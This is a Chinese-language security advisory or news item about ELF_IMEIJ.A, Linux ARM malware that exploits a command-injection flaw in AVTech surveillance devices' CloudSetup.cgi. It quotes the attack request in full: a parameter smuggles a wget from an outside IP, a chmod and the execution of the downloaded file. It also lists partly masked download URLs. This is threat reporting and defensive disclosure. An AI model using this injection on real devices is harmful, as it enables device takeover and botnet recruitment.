Linux一直以来都是企业平台及物联网设备制造商的首选操作系统,随着今年来物联网的广泛应用,以Linux为攻击目标的安全威胁数量正逐年攀升。其中,影响最大的莫过于MIRAI恶意软件,2016年全球受Mirai感染的物联网设备达50万,网络监控摄像头、DVRs、路由器等其它家用网络设备都是Mirai僵尸网络的“猎物”。 近日,亚信安全截获最新Linux ARM恶意软件IMEIJ,亚信安全将其命名为ELF_IMEIJ.A。IMEIJ利用了AVTech(一家监控技术公司)设备中的一个漏洞。该漏洞由Search-Lab(一个安全研究机构)发现并报告,并于2016年10月向AVTech披露。但是,对于本次发现漏洞,厂家没有给予回应。 IMEIJ恶意软件通过cgi-bin脚本进行传播,远程攻击者将下列网络请求发送到随机IP地址,并尝试利用此漏洞。 POST/cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1 具体来说,IMEIJ就是利用AVTech所报告的CGI目录漏洞CloudSetup.cgi执行命令注入,触发恶意软件下载。攻击者欺骗设备下载恶意文件并且更改文件权限,在本地执行该恶意文件。 亚信安全共检测到三个IP地址可以下载IMEIJ恶意软件,这三个IP地址的互联网服务提供商(ISP)均位于韩国: hxxp://172.247.1**.3:8080/Arm1; hxxp://172.247.1**.21:85/Arm1; hxxp://192.154.1**.2:8080/Arm1. 据报道,AVTech已有超过13万个不同的设备连接到互联网,足以保证ELF_IMEIJ.A可以进行持续性攻击,更糟糕的是,这些设备可以组成僵尸网络,发动大规模的DDoS攻击。
|
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
注册
登录
